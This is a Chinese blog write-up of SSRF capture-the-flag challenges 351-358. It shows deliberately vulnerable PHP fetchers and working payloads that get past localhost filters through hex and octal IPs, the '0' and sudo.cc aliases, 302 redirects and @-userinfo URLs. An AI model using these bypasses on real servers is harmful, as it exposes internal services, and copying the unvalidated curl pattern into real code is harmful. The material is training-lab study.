SSRFweb入門-351-358

Govced發表於2024-12-07

351:

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

payload:url=http://localhost/flag.php
352:

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

這題限制了只能用http和https
同時不可以出現localhost或者是127.0.0 繞過
這題可以用進位制繞過：
各種進位制的IP地址

預設

http://127.0.0.1

16進位制

http://0x7F000001

8進位制

http://0177.0000.0000.0001
353：

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

ip只要以127/172開頭就代表內網地址，不一定非得127.0.0.1
在Linux中0表示自身的地址
還可以用長整型繞過
或使用sudo.cc代替127.0.0.1/localhost
payload：url=http://o/flag.php
354:

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

payload：url=http://sudo.cc/flag.php
355:

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

這題對長度進行了限制
payload：url=http://0/flag.php
356:
不放了和355一樣
357：

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>

這題因為使用了 gethostbyname 獲取了真實 IP 地址，所以域名指向方法不能再使用
使用302重定向
358：
payload：url=http://ctf.@127.0.0.1/flag.php?show

入門入門入門 MySQL命名行
2020-12-15
MySql
何入CTF的“門”？——所謂入門就是入門
2020-11-04
如何入CTF的“門”？——所謂入門就是入門
2020-12-21
scala 從入門到入門+
2019-02-16
makefile從入門到入門
2020-10-06
gRPC（二）入門：Protobuf入門
2022-11-09
RPC
【小入門】react極簡入門
2019-07-22
React
Android入門教程 | RecyclerView使用入門
2021-11-07
AndroidView
新手入門，webpack入門詳細教程
2018-11-15
Web
Android入門教程 | Kotlin協程入門
2021-12-06
AndroidKotlin
《Flutter 入門經典》之“Flutter 入門 ”
2021-02-02
Flutter
MyBatis從入門到精通(一)：MyBatis入門
2019-06-28
MyBatis
Tableau入門
2019-02-28
angular入門
2019-02-16
Angular
lodash入門
2018-10-18
Webpack 入門
2019-03-27
Web
golang 入門
2019-02-16
Golang
lapis入門
2019-02-16
API
MarkDown入門
2018-11-06
JSP入門
2019-01-08
JS
UML入門
2019-04-04
VuePress 入門
2019-02-21
Vue
RSA入門
2018-11-22
jQuery入門
2018-11-20
jQuery
Hive 入門
2018-12-12
Hive
scrapy入門
2018-12-13
Fetch 入門
2018-12-16
WebSocket 入門
2019-03-27
Web
indexedDB入門
2019-02-13
Index
Netty入門
2018-10-14
Netty
GraphQL入門
2018-10-04
Serlvet入門
2018-10-07
ORM入門
2018-08-09
ORM
RESTful入門
2018-09-19
REST
Feathers 入門
2018-05-14
HTTP入門
2018-06-22
HTTP
入門Webpack
2018-06-12
Web
JPA入門
2018-08-21

SSRFweb入門-351-358

預設

16進位制

8進位制

相關文章